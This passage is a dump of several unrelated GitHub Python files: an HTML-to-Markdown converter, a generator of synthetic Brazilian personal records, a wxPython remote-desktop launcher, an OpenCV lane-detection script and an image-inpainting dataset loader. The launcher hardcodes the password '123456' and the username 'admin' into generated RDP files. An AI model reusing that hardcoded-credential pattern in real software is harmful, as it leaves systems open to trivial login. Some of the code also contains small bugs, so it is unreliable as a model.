\"TD\"]\n\nDO_NOTHING_END = [\"HTML\", \"HEAD\", \"META\", \"STYLE\", \"BODY\", \"FONT\",\n \"COL\", \"TR\", \"TD\", \"BR\"]\n\nREMOVE_CONTENT = [\"STYLE\", \"COL\", \"TR\", \"TD\"]\n\n\nBLANK_LINE = [\"TITLE\", \"H1\", \"H2\", \"H3\", \"H4\", \"H5\", \"P\"]\n\n\nclass MyHTMLParser(HTMLParser):\n out = None\n currenttag = \"\"\n \n tablenb = 0\n intable = False\n\n verbose = False\n imagelog = open(\"imagelog.txt\", \"w\")\n\n inlink = False\n datalink = \"\"\n url = \"\"\n\n def setOutputFile(self, out, verbose=False):\n self.out = out\n self.verbose = verbose\n \n \n def handle_starttag(self, tag, attrs):\n if (self.verbose):\n print(\"Encountered a start tag:\", tag)\n thetag = tag.upper()\n self.currenttag = thetag\n if (thetag in DO_NOTHING_BEGIN):\n if (self.verbose):\n print(\"Doing nothing\")\n return\n if (thetag == \"TITLE\"):\n self.out.write(\"# \")\n return\n if (thetag == 
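`isValidWord` expands the hand into a letter list and removes matches one by one. `collections.Counter` expresses the same multiset test more directly; a sketch with a made-up word list:

```python
from collections import Counter

def is_valid_word(word, hand, word_list):
    """True if `word` is in `word_list` and never uses a letter more
    times than `hand` provides."""
    if word not in word_list:
        return False
    return all(hand.get(ch, 0) >= n for ch, n in Counter(word).items())

hand = {"h": 1, "a": 1, "m": 2, "e": 1, "r": 1}
print(is_valid_word("hammer", hand, ["hammer"]))    # True
print(is_valid_word("hammers", hand, ["hammers"]))  # False: no 's' in hand
```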
\"H1\"):\n self.out.write(\"## \")\n return\n if (thetag == \"H2\"):\n self.out.write(\"### \")\n return\n if (thetag == \"H3\"):\n self.out.write(\"#### \")\n return\n if (thetag == \"H4\"):\n self.out.write(\"##### \")\n return\n if (thetag == \"H5\"):\n self.out.write(\"###### \")\n return\n if (thetag == \"A\"):\n if (self.intable):\n return\n else:\n self.inlink = True\n # getting href value\n self.url = attrs[0][1]\n # print(\"entering a, url = \" + self.url)\n return\n if (thetag == \"BR\"):\n if (self.intable):\n return\n else:\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"B\"):\n if (self.intable):\n return\n else:\n self.out.write(\"**\")\n return\n if (thetag == \"TABLE\"):\n # protecting table from other tags\n self.out.write(\"\\n\\n\")\n self.tablenb += 1\n self.intable = True\n return\n if (self.verbose):\n print(\"No treatment for tag: \" + tag)\n \n\n def handle_endtag(self, tag):\n if (self.verbose):\n print(\"Encountered an end tag :\", tag)\n thetag = tag.upper()\n if (thetag in DO_NOTHING_END):\n if (self.verbose):\n print(\"Doing nothing\")\n return\n if (thetag in BLANK_LINE):\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"B\"):\n if (self.intable):\n return\n else:\n self.out.write(\"** \")\n return\n if (thetag == \"A\"):\n self.out.write(\" [\" + self.datalink + \"](\" + self.url + \") \")\n self.inlink = False\n #print(\"exiting a\")\n return\n if (thetag == \"P\"):\n if (self.ntable):\n return\n else:\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"TABLE\"):\n imagename = self.out.name.split('.')[0] \\\n + '-Table' + str(self.tablenb).zfill(2) + \".png\"\n self.out.write(\"![\" + imagename + \"](\" + imagename + \")\\n\\n\")\n self.intable = False\n self.imagelog.write(imagename + \"\\n\")\n return\n if (self.verbose):\n print(\"No treatment for tag: \" + tag)\n\n \n def handle_data(self, data):\n #print(\"Encountered some data :\", data)\n if (self.intable):\n return\n if (self.inlink):\n #print(\"adding data: \" + removeBlanks(data))\n self.datalink += removeBlanks(data)\n return\n if (not (self.currenttag in REMOVE_CONTENT)):\n self.out.write(removeBlanks(data))\n\n\n'''\nclass Table:\n # row numbers start at 0\n rows = [][]\n def addCell(self, rownumber, value):\n self.rows[rownumber].append(value)\n def serialize(self):\n output = \"\"\n # first row determines the number of columns\n nbcol = len(rows[0])\n nbrows = len(rows)\n print(\" The table has \" + str(nbcol + \" columns and \" + str(nbroxs) + \" rows.\")\n # writing header\n for (value in rows[0]):\n output += \"| \" + value + \" \"\n output += \" |\\n\"\n # writing separator\n for (i in range(0, nbcol)):\n output += \"| --- \"\n output += \" |\\n\"\n # some lines may not have the right amount of columns\n for (i in range(1,nbrows)):\n therow = row[i]\n if (len(therow) < nbcol):\n print(\"Error\")\n print(therow)\n break;\n'''\n \n\n#--------------------------------\n# Utilities\n#--------------------------------\n \ndef removeBlanks(s):\n # removing Windows CR/LF\n ns = s.replace(\"\\r\\n\", \" \")\n # removing Unix LF\n ns = ns.replace(\"\\n\", \" \")\n # stripping white spaces left and right\n ns = ns.strip()\n return re.sub(' +', ' ', ns)\n\n\n#--------------------------------\n# A little brutal - did not have time to package it in a shell\n#--------------------------------\n\nFILES = [\n \"00 Legal.html\",\n \"01 Basics.html\",\n \"02 Description.html\",\n \"03 Races.html\",\n \"04 ClassesI.html\",\n \"05 ClassesII.html\",\n \"06 SkillsI.html\",\n \"07 
SkillsII.html\",\n \"08 Feats.html\",\n \"09 Equipment.html\",\n \"10 SpecialMaterials.html\",\n \"11 CombatI.html\",\n \"12 CombatII.html\",\n \"13 AbilitiesandConditions.html\",\n \"14 NPCClasses.html\",\n \"15 PrestigeClasses.html\",\n \"16 MagicOverview.html\",\n \"17 SpellListI.html\",\n \"18 SpellListII.html\",\n \"19 SpellsA-B.html\",\n \"20 SpellsC.html\",\n \"21 SpellsD-E.html\",\n \"22 SpellsF-G.html\",\n \"23 SpellsH-L.html\",\n \"24 SpellsM-O.html\",\n \"25 SpellsP-R.html\",\n \"26 SpellsS.html\",\n \"27 SpellsT-Z.html\",\n \"28 MagicItemsI.html\",\n \"29 MagicItemsII.html\",\n \"30 MagicItemsIII.html\",\n \"31 MagicItemsIV.html\",\n \"32 MagicItemsV.html\",\n \"33 MagicItemsVI.html\",\n \"34 MonstersIntro-A.html\",\n \"35 MonstersB-C.html\",\n \"36 MonstersD-De.html\",\n \"37 MonstersDi-Do.html\",\n \"38 MonstersDr-Dw.html\",\n \"39 MonstersE-F.html\",\n \"40 MonstersG.html\",\n \"41 MonstersH-I.html\",\n \"42 MonstersK-L.html\",\n \"43 MonstersM-N.html\",\n \"44 MonstersO-R.html\",\n \"45 MonstersS.html\",\n \"46 MonstersT-Z.html\",\n \"47 MonstersAnimals.html\",\n \"48 MonstersVermin.html\",\n \"49 TypesSubtypesAbilities.html\",\n \"50 Improving Monsters.html\",\n \"51 MonsterFeats.html\",\n \"52 MonstersasRaces.html\",\n \"53 CarryingandExploration.html\",\n \"54 Treasure.html\",\n \"55 WildernessandEnvironment.html\",\n \"56 Traps.html\",\n \"57 Planes.html\",\n \"58 PsionicRaces.html\",\n \"59 PsionicClasses.html\",\n \"60 PsionicSkills.html\",\n \"61 PsionicsFeats.html\",\n \"62 PowersOverview.html\",\n \"63 PowerList.html\",\n \"64 PsionicPowersA-C.html\",\n \"65 PsionicPowersD-F.html\",\n \"66 PsionicPowersG-P.html\",\n \"67 PsionicPowersQ-W.html\",\n \"68 PsionicMonsters.html\",\n \"69 PsionicItems.html\",\n \"70 PsionicSpells.html\",\n \"71 EpicLevelBasics.html\",\n \"72 EpicClasses.html\",\n \"73 EpicPrestigeClasses.html\",\n \"74 EpicSkills.html\",\n \"75 EpicFeats.html\",\n \"76 EpicSpells.html\",\n \"77 EpicMagicItems1.html\",\n \"78 EpicMagicItems2.html\",\n \"79 EpicMonsters(A-E).html\",\n \"80 EpicMonsters(G-W).html\",\n \"81 EpicObstacles.html\",\n \"82 DivineRanksandPowers.html\",\n \"83 DivineAbilitiesandFeats.html\",\n \"84 DivineDomainsandSpells.html\",\n \"85 DivineMinions.html\"\n]\n\n\nif __name__ == \"__main__\":\n for infile in FILES:\n print(\"Converting: \" + infile)\n outfile = infile.split('.')[0] + \".md\"\n inf = open(infile, \"r\")\n outf = open(outfile, \"w\")\n parser = MyHTMLParser()\n parser.setOutputFile(outf)\n parser.feed(inf.read())\n inf.close()\n outf.close()\n print(\"Done\")\n\n","repo_name":"orey/stuff","sub_path":"tools/file-conversions/html2md/html2md.py","file_name":"html2md.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14875294695","text":"import random\nimport datetime\nimport requests\nimport buscacep\n\nclass Pessoa:\n\n def __init__(self):\n self.sexo = \"M\" if random.random() > 0.5 else \"F\"\n self.cpf = self.criarCPF()\n self.nome = self.gerarNome(self.sexo) if random.random() > 0.5 else ' '.join((self.gerarNome(self.sexo),self.gerarNome(self.sexo)))\n self.sobrenome = self.gerarSobrenome()\n self.data_nascimento = self.gerarDataNascimento()\n self.idade = abs(int(self.data_nascimento.split(\"-\")[0]) - datetime.datetime.now().year)\n self.telefone = self.gerarNumeroTelefone()\n self.geraEndereço()\n self.tipoSanguineo = ['A-', 'A+', 'B-', 'B+', 'AB-', 'AB+', 'O-', 'O+'][random.randrange(8)]\n \n def 
criarCPF(self):\n def calcula_digito(digs):\n s = 0\n qtd = len(digs)\n for i in range(qtd):\n s += n[i] * (1+qtd-i)\n res = 11 - s % 11\n if res >= 10: return 0\n return res \n n = [random.randrange(10) for i in range(9)]\n n.append(calcula_digito(n))\n n.append(calcula_digito(n))\n return ''.join(map(str, n))\n\n def gerarNome(self, sexo):\n file = 'nomes_masculinos.csv' if sexo == \"M\" else 'nomes_femininos.csv'\n rand = random.randint(0,1000)\n with open(file, 'r') as lista:\n for i, line in enumerate(lista):\n if i == rand:\n nome = line.split(',')[0].title()\n return nome \n\n def gerarSobrenome(self):\n rand = random.randrange(90) if random.random() > 0.5 else random.randrange(1800)\n with open('listadesobrenomesbrasileiros.txt', 'r', encoding = 'utf=8') as nomes:\n for i, line in enumerate(nomes):\n if i == rand:\n return line.split(',')[0]\n\n def gerarDataNascimento(self):\n return f\"{random.randrange(1970, 2002)}-{str(random.randrange(1,12)).zfill(2)}-{str(random.randrange(1,28)).zfill(2)}\"\n\n def gerarNumeroTelefone(self, fixo=False):\n tipo = '' if fixo else '9'\n numero = f'{tipo}'\n numero += str(random.randint(1,9))\n for n in range(7):\n numero += str(random.randint(0,9))\n return numero\n\n def geraEndereço(self):\n rand = random.randint(0,732763)\n with open(\"lista_ceps.txt\", \"r\", encoding=\"utf-8\") as ceps:\n for linha, cep in enumerate(ceps):\n if rand == linha:\n cep_aleatorio = cep\n \n endereço= buscacep.busca_cep_correios_as_dict(cep_aleatorio[:8])\n self.rua = endereço['logradouro']\n self.cidade, self.estado = endereço['localidade'].split(\"/\")\n self.bairro = endereço['bairro']\n self.cep = endereço['cep']\n self.numero = random.randint(1,700)\n\nif __name__ == \"__main__\":\n \n headers = {'content-type': 'application/json'}\n url = \"URL_POST\"\n for i in range(5):\n novaPessoa = Pessoa()\n dados = {\n \"nome\" : f\"{' '.join((novaPessoa.nome, novaPessoa.sobrenome))}\",\n \"sexo\" : f\"{novaPessoa.sexo}\",\n \"cpf\" : f\"{novaPessoa.cpf}\",\n \"idade\" : f\"{novaPessoa.idade}\",\n \"nascimento\" : f\"{novaPessoa.data_nascimento}\",\n \"telefone\" : f\"{novaPessoa.telefone}\",\n \"rua\" : f\"{novaPessoa.rua}\",\n \"número\": f\"{novaPessoa.numero}\",\n \"cidade\" : f\"{novaPessoa.cidade}\",\n \"bairro\" : f\"{novaPessoa.bairro}\",\n \"cep\" : f\"{novaPessoa.cep}\",\n \"tipo sanguíneo\" : f\"{novaPessoa.tipoSanguineo}\"\n }\n \n #r = requests.post(url, json=dados, headers=headers)\n print(dados)\n","repo_name":"AndreiZmk/python","sub_path":"01_gerar_pessoa_objeto.py","file_name":"01_gerar_pessoa_objeto.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35667238054","text":"# -*- coding:utf-8 -*-\nimport wx\nimport wx.lib.analogclock as ac\nimport wx.lib.agw.aquabutton as AB\nimport wx.gizmos as gizmos\nimport time\nimport random\nimport os\nimport sys\nimport binascii\nimport win32crypt,cmd\n\n\nu_pwd = unicode('123456')\npwdHash = win32crypt.CryptProtectData(u_pwd,u'',None,None,None,0)\npwd = 'password 51:b:' + binascii.hexlify(pwdHash).upper()\n\n\nuname = 'username:s:'\nkeys = ['IE6', 'IE7', 'IE8', 'IE9', 'IE10', 'win32IE11', 'win64IE11']\n\nfor mname in keys:\n if not os.path.exists('./rdp/'+mname+'.rdp'):\n model = open('./model/'+mname+'.txt')\n mdate = model.read()\n new = open('./rdp/'+mname+'.rdp', 'w')\n new.write(mdate)\n new.write(uname+\"admin\")\n new.write(\"\\n\")\n new.write(pwd)\n new.close()\n\n\n\nclass Mytime(wx.Panel):\n 
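`criarCPF` builds the two CPF verification digits with a weighted sum mod 11. The check-digit rule pulled out so it can also validate existing numbers; the weights and the `res >= 10 -> 0` convention follow the code above:

```python
import random

def cpf_check_digit(digits):
    """One CPF verification digit from the digits that precede it."""
    weights = range(len(digits) + 1, 1, -1)   # qtd+1 down to 2
    res = 11 - sum(d * w for d, w in zip(digits, weights)) % 11
    return 0 if res >= 10 else res

def random_cpf():
    base = [random.randrange(10) for _ in range(9)]
    base.append(cpf_check_digit(base))        # first check digit (over 9)
    base.append(cpf_check_digit(base))        # second check digit (over 10)
    return "".join(map(str, base))

def is_valid_cpf(cpf):
    n = [int(c) for c in cpf]
    return n[9] == cpf_check_digit(n[:9]) and n[10] == cpf_check_digit(n[:10])

print(is_valid_cpf(random_cpf()))  # True
```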
    #Clock method; the clock is then added to the boxsizer\n    def __init__(self,parent):\n        wx.Panel.__init__(self,parent)\n        self.SetBackgroundColour(\"blue\")\n        \n        #Clock display\n        led = gizmos.LEDNumberCtrl(self,-1,(0,0),(300,50),gizmos.LED_ALIGN_CENTER)\n        self.clock = led\n        self.timer = wx.Timer(self)\n        self.timer.Start(1000)\n        self.Bind(wx.EVT_TIMER,self.OnTimer)\n        \n    def OnTimer(self,evt):\n        t = time.localtime(time.time())\n        st = time.strftime(\"%I-%M-%S\",t)\n        self.clock.SetValue(st)\n\nclass MyButton(wx.Panel):\n    #-------------Remote connection buttons---------------------------------------------------------\n    def __init__(self,parent):\n        \"\"\"\"\"\"\n        wx.Panel.__init__(self,parent,-1)\n        self.SetBackgroundColour(wx.Colour(0,255,255))\n\n        box = wx.BoxSizer(wx.VERTICAL)\n        font = wx.Font(18, wx.DECORATIVE, wx.ITALIC, wx.NORMAL)\n        #Button data\n        self.date={\"IE6\":\"./rdp/IE6.rdp\",\n                   \"IE7\":\"./rdp/IE7.rdp\",\n                   \"IE8\":\"./rdp/IE8.rdp\",\n                   \"IE9\":\"./rdp/IE9.rdp\",\n                   \"IE10\":\"./rdp/IE10.rdp\",\n                   \"32IE11\":\"./rdp/win32IE11.rdp\",\n                   \"64IE11\":\"./rdp/win64IE11.rdp\"}\n        #Create the buttons in a loop\n        self.buttonid={}\n        for buttonname in self.date:\n            \n            r = random.randint(0, 255)\n            g = random.randint(0, 255)\n            b = random.randint(0, 255) \n            \n            btn = AB.AquaButton(self,-1,None,buttonname)\n            box.Add(btn,1,wx.EXPAND |wx.EAST| wx.WEST,5)\n            btn.SetBackgroundColor(wx.Colour(r,g,b))\n            btn.SetHoverColor(wx.Colour(g,r,b))\n            btn.SetForegroundColour(\"black\")\n            btn.SetFont(font)\n            self.Bind(wx.EVT_BUTTON, self.OnClick, btn)\n            self.buttonid[btn.GetId()]= buttonname\n        self.SetSizer(box)\n    \n    def OnClick(self,evt):\n        ip = self.date[self.buttonid[evt.GetId()]]\n        os.system(\"mstsc %s /console \" % ip)\n    \n    \nclass MyFrame(wx.Frame):\n    def __init__(self):\n        wx.Frame.__init__(self,None,- 1, u\"远程链接\", size=(300,450),style=wx.DEFAULT_FRAME_STYLE)\n        #self.SetBackgroundColour('black')\n        #Set the program icon\n        self.SetMaxSize((300,500))\n        self.ICON = wx.Icon(\"2.ico\",wx.BITMAP_TYPE_ICO)\n        self.SetIcon(self.ICON)\n        \n        mytime = Mytime(self)\n        mybutton = MyButton(self)\n        \n        box = wx.BoxSizer(wx.VERTICAL)\n        box.Add(mytime,-1,wx.EXPAND|wx.ALL)\n        box.Add(mybutton,2,wx.EXPAND|wx.ALL)\n        self.SetSizer(box)\n        \n        self.taskBarIcon = TaskBarIcon(self)\n        self.Bind(wx.EVT_CLOSE,self.OnClose)\n        self.Bind(wx.EVT_ICONIZE,self.OnIconfiy)\n        \n        \n\n    \n    #On minimize, hide the window to the system tray \n    def OnIconfiy(self,event):\n        self.Hide()\n    \n    #On close, hide the window to the system tray \n    def OnClose(self,event):\n        self.Hide()\n    \n########################################################################\nclass TaskBarIcon(wx.TaskBarIcon):\n    #Minimize-to-tray icon\n\n    #--------------ID----------------------------------------------\n    ID_Abuout = wx.NewId()\n    ID_MainFrame = wx.NewId()\n    ID_Exit = wx.NewId()\n    '''\n    ID_IE6 = wx.NewId()\n    ID_IE7 = wx.NewId()\n    ID_IE8 = wx.NewId()\n    ID_IE9 = wx.NewId()\n    ID_IE10 = wx.NewId()\n    ID_IE3211 = wx.NewId()\n    ID_IE6411 = wx.NewId()\n    '''\n    \n    #---------------IPs for the different machines, and the tray-menu item IDs----------------------\n    date={\"IE6\":6,\n        \"IE7\":7,\n        \"IE8\":8,\n        \"IE9\":9,\n        \"IE10\":10,\n        \"32IE11\":11,\n        \"64IE11\":12} \n    date1={6:\"./rdp/IE6.rdp\",\n        7:\"./rdp/IE7.rdp\",\n        8:\"./rdp/IE8.rdp\",\n        9:\"./rdp/IE9.rdp\",\n        10:\"./rdp/IE10.rdp\",\n        11:\"./rdp/win32IE11.rdp\",\n        12:\"./rdp/win64IE11.rdp\"} \n    \n    def __init__(self,frame):\n        wx.TaskBarIcon.__init__(self)\n        \n        self.SetMainFrame(frame) \n        self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK,self.OnTaskBarLeftDClick)\n        self.Bind(wx.EVT_MENU, self.OnMainFrame, id=self.ID_MainFrame)\n        self.Bind(wx.EVT_MENU, self.OnExit, id=self.ID_Exit)\n        \n        \n    def SetMainFrame(self, frame):\n        self.frame = frame\n
        self.SetIcon(wx.Icon(\"2.ico\",type=wx.BITMAP_TYPE_ICO),u\"远程链接\")\n\n    def OnTaskBarLeftDClick(self,event):\n        if self.frame.IsIconized():\n            self.frame.Iconize(False)\n        if not self.frame.IsShown():\n            self.frame.Show(True)\n        self.frame.Raise()\n    \n    def OnMainFrame(self,event): \n        #Show the main panel\n        if not self.frame.IsShown():\n            self.frame.Show(True)\n        self.frame.Raise()\n    \n    #------------------------------------- \n    def OnExit(self,event):\n        #Close the program\n        wx.Exit()\n    \n    def CreatePopupMenu(self):\n        #Build the minimized tray menu\n        self.menu = wx.Menu()\n        \n        self.menu.Append(self.ID_MainFrame, u\"主面板\")\n        self.menu.AppendSeparator()\n        self.Bind(wx.EVT_MENU,self.ConnectIE,id =self.ID_MainFrame)\n        \n        for key in self.date:\n            if key:\n                self.menu.Append(self.date[key],key)\n                self.Bind(wx.EVT_MENU,self.ConnectIE, id=self.date[key])\n        \n        self.menu.AppendSeparator()\n        self.menu.Append(self.ID_Exit, u\"退出\")\n        return self.menu\n    \n    def ConnectIE(self, event):\n        #Connect to the remote machine from the tray\n        ip = self.date1[event.GetId()]\n        os.system(\"mstsc %s /console\" % ip)\n    \n\n    \n\n    \n    \n    \nif __name__ == '__main__':\n    app = wx.App()\n    fram = MyFrame()\n    fram.Show()\n    app.MainLoop()\n    \n","repo_name":"willcaty/Remote-Connection","sub_path":"wanghao.py","file_name":"wanghao.py","file_ext":"py","file_size_in_byte":6789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31357513803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 1 07:43:49 2018\n\n@author: Krishna mohan\n\"\"\"\n\nimport cv2, numpy as np, math\n\ndef resize(image):\n    return cv2.resize(image, (700, 500))\nimage = resize(cv2.imread(\"road.jpg\"))\n\ndef show_img(image):\n    #print_size(image)\n    cv2.imshow('my_pic', image)\n    cv2.waitKey(30000)\n    cv2.destroyAllWindows()\n    \nHSV_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\nshow_img(image)\nshow_img(HSV_image)\n\n\ndef maskHSV(img):\n    lower_red = np.array([0,0,180])\n    upper_red = np.array([150,200,255])\n    \n    mask = cv2.inRange(img, lower_red, upper_red)\n    return cv2.bitwise_and(img, img, mask = mask)\n    \n\ndef getLanes(HSV_image, image):\n    lanes = maskHSV(HSV_image)\n    return lanes;\n\nlanes = getLanes(HSV_image, image)\nshow_img(lanes)\n\n\ngray = cv2.cvtColor(lanes, cv2.COLOR_RGB2GRAY)\n\nshow_img(gray)\n\n#roi = gray[220:, :]\n#roi = cv2.setImageROI(gray, [220:, :])\n\n\n\n\n\n\n\n\n\n\n\ndef selectROI(image):\n    rows, cols = image.shape[:2]\n    lower_left = [680, 220]\n    lower_right = [680, 500]\n    top_left = [5, 220]\n    top_right = [5, 500]\n    \n    \n    vertices = np.array([[lower_left, top_left, top_right, lower_right]], dtype=np.int32)\n    \n    mask = np.zeros_like(image)\n    \n    if len(mask.shape) == 2:\n        cv2.fillPoly(mask, vertices, 255)\n    else:\n        cv2.fillPoly(mask, vertices, (255,)*mask.shape[2]) # in case the input image has a channel dimension \n    return cv2.bitwise_or(image, mask)\n    \n    \nroi = selectROI(image)\n#roi = image[250:500, 0:700]\nprint(\"ROI\")\nshow_img(roi)\nrows, cols = roi.shape[:2]\nsrc = np.float32([[0, cols], [cols, rows], [0, 0], [rows, 0]])\ndst = np.float32([[250, 300], [250, 500], [0, 0], [0, 700]])\n#dst = src\n\nM = cv2.getPerspectiveTransform(src, dst)\nwarped_img = cv2.warpPerspective(roi, M, (cols, rows))\nshow_img(warped_img)\n\n\n\n\n\n\n\n\n\n\n\n#blur = cv2.GaussianBlur(roi, (5,5),0)\n\n#show_img(blur)\n\n'''\n\nedges = cv2.Canny(roi, 50, 150)\nshow_img(edges)\n\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=150, maxLineGap=250)\n\n\n\nfor i in lines:\n    x1, y1, x2, y2 = i[0]\n    \n    #if (x1 < 20 and x2 > 689) or (x1 > 140 and x2 > 600) and 
(x2-x1 > 50 or y2-y1 > 120):\n if y1 != y2:\n if y1-y2 > 40 or y2-y1 > 40:\n print(i)\n print(math.sqrt(((x2-x1)**2)+((y2-y1)**2)))\n cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)\n show_img(image)\n'''\n\n\n\nrows, cols = roi.shape[:2]\n\n","repo_name":"krishnardt/AutoDrive","sub_path":"Lanes.py","file_name":"Lanes.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23149562473","text":"import os\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nfrom torch.utils.data import Dataset\r\nimport os.path\r\nimport random\r\nimport torchvision.transforms as transforms\r\nimport torch\r\nfrom utils import make_dataset\r\nfrom PIL import Image, ImageDraw\r\n\r\n\r\nclass Image_Editing_Dataset(Dataset):\r\n def __init__(self, cfg, dataset_root, split='train', dataset_name=''):\r\n self.split = split\r\n self.cfg = cfg\r\n self.dataset_name = dataset_name\r\n\r\n self.dir_img = os.path.join(dataset_root, self.split, 'images')\r\n self.dir_lab = os.path.join(dataset_root, self.split, 'labels')\r\n self.dir_ins = os.path.join(dataset_root, self.split, 'inst_map')\r\n name_list = os.listdir(self.dir_img)\r\n self.name_list = [n[:-4] for n in name_list if n.endswith('jpg')]\r\n \r\n if self.split == 'test':\r\n self.name_list.sort()\r\n \r\n self.predefined_mask_path = 'data/predefined_mask/'\r\n mask_list = os.listdir(self.predefined_mask_path)\r\n mask_list.sort()\r\n self.mask_list = mask_list[:len(self.name_list)]\r\n\r\n def __getitem__(self, index):\r\n name = self.name_list[index]\r\n # input data\r\n img = cv2.imread(os.path.join(self.dir_img, name + '.jpg'))\r\n lab = cv2.imread(os.path.join(self.dir_lab, name + '.png'), 0)\r\n\r\n if self.dataset_name == 'cityscapes':\r\n inst_map = Image.open(os.path.join(self.dir_ins, name + '.png'))\r\n inst_map = np.array(inst_map, dtype=np.int32)\r\n elif self.dataset_name == 'ADE20k-room':\r\n inst_map = cv2.imread(os.path.join(self.dir_ins, name + '.png'))\r\n inst_map = inst_map[:, :, 1]\r\n \r\n if self.split == 'train':\r\n # resize\r\n size = (self.cfg['crop_size'], self.cfg['crop_size'])\r\n h, w, _ = img.shape\r\n w_l = 0\r\n h_l = 0\r\n if w > 256:\r\n w_l = random.randint(0, w - 256)\r\n if h > 256:\r\n h_l = random.randint(0, h - 256)\r\n \r\n img = img[h_l:h_l+256, w_l:w_l+256]\r\n lab = lab[h_l:h_l+256, w_l:w_l+256]\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n inst_map = inst_map[h_l:h_l+256, w_l:w_l+256]\r\n # flip\r\n if random.random() > 0.5:\r\n img = np.flip(img,axis=1).copy()\r\n lab = np.flip(lab,axis=1).copy()\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n inst_map = np.flip(inst_map,axis=1).copy()\r\n \r\n # select inst id\r\n if self.dataset_name == 'cityscapes':\r\n inst_ids = np.unique(inst_map)\r\n inst_ids = inst_ids.tolist()\r\n inst_ids = [i for i in inst_ids if i>=1000] # filter out non-instance masks\r\n elif self.dataset_name == 'ADE20k-room':\r\n inst_ids = np.unique(inst_map)\r\n inst_ids = inst_ids.tolist()\r\n\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n no_inst = False\r\n if len(inst_ids) == 0:\r\n no_inst = True\r\n else:\r\n selected_inst_id = random.choice(inst_ids)\r\n \r\n lab_ori = lab.copy()\r\n \r\n lab_ids = np.unique(lab)\r\n lab_ids = lab_ids.tolist()\r\n selected_lab_id = random.choice(lab_ids)\r\n \r\n img = get_transform(img)\r\n lab = get_transform(lab, normalize=False)\r\n lab = lab * 
255.0\r\n \r\n if self.split == 'train':\r\n mask_type = index % 5\r\n if self.dataset_name == 'ADE20k-landscape':\r\n mask_type = index % 4\r\n # \r\n if mask_type == 0:\r\n mask = brush_stroke_mask()\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n elif mask_type == 1:\r\n mask = self.load_right_mask(self.cfg['crop_size'])\r\n elif mask_type == 2:\r\n mask = self.load_center_mask(self.cfg['crop_size'], split='train')\r\n elif mask_type == 3:\r\n mask = np.array(np.equal(lab_ori, selected_lab_id).astype(np.uint8))\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n elif mask_type == 4:\r\n if not no_inst:\r\n mask = np.zeros((256, 256), np.float32)\r\n ys,xs = np.where(inst_map==selected_inst_id)\r\n ymin, ymax, xmin, xmax = ys.min(), ys.max(), xs.min(), xs.max()\r\n mask[ymin:ymax, xmin:xmax] = 1\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n else:\r\n mask = brush_stroke_mask()\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n \r\n else:\r\n mask = cv2.imread(os.path.join(self.predefined_mask_path, self.mask_list[index]), 0) / 255\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n \r\n mask = torch.from_numpy(mask)\r\n masked_img = img * (1. - mask)\r\n\r\n inst_map = inst_map.reshape((1,) + inst_map.shape).astype(np.float32)\r\n inst_map = torch.from_numpy(inst_map)\r\n \r\n return {'img': img, 'masked_img': masked_img, 'lab': lab, 'mask': mask, 'inst_map': inst_map, 'name': name}\r\n # 'mask_seam': mask_seam,\r\n\r\n def __len__(self):\r\n \"\"\"Return the total number of images in the dataset.\"\"\"\r\n return len(self.name_list)\r\n\r\n def load_center_mask(self, crop_size, split): \r\n # rect\r\n height, width = crop_size, crop_size\r\n mask = np.ones((height, width), np.float32)\r\n if split == 'test':\r\n mask[64:192, 64:192] = 0.\r\n w1 = 64\r\n w2 = 64 + 128\r\n h1 = 64\r\n h2 = 64 + 128\r\n else:\r\n w1 = random.randint(32, 96)\r\n w2 = w1 + 128\r\n h1 = random.randint(32, 96)\r\n h2 = h1 + 128\r\n mask[h1:h2, w1:w2] = 0. # edited region is 1, non-edited region is 0\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return mask\r\n\r\n def load_right_mask(self, img_shapes, mask_rate=0.5):\r\n height, width = img_shapes, img_shapes\r\n mask = np.zeros((height, width), np.float32)\r\n\r\n mask_length = int(width * mask_rate) # masked length\r\n w1 = width - mask_length\r\n mask[:, w1:] = 1. 
# edited region is 1, non-edited region is 0\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return mask\r\n\r\n def load_seam_mask(self, img_shapes, box):\r\n m = 16\r\n height, width = img_shapes, img_shapes\r\n mask1 = np.ones((height, width), np.float32)\r\n mask2 = np.zeros((height, width), np.float32)\r\n \r\n mask1[box[0]+m:box[1]-m, box[2]+m:box[3]-m] = 0.\r\n mask2[box[0]-m:box[1]+m, box[2]-m:box[3]+m] = 1.\r\n \r\n mask = mask1 * mask2\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return torch.from_numpy(mask)\r\n\r\n\r\ndef get_transform(img, normalize=True):\r\n transform_list = []\r\n\r\n transform_list += [transforms.ToTensor()]\r\n if normalize:\r\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\r\n return transforms.Compose(transform_list)(img)\r\n\r\ndef brush_stroke_mask(H=256, W=256):\r\n min_num_vertex = 4\r\n 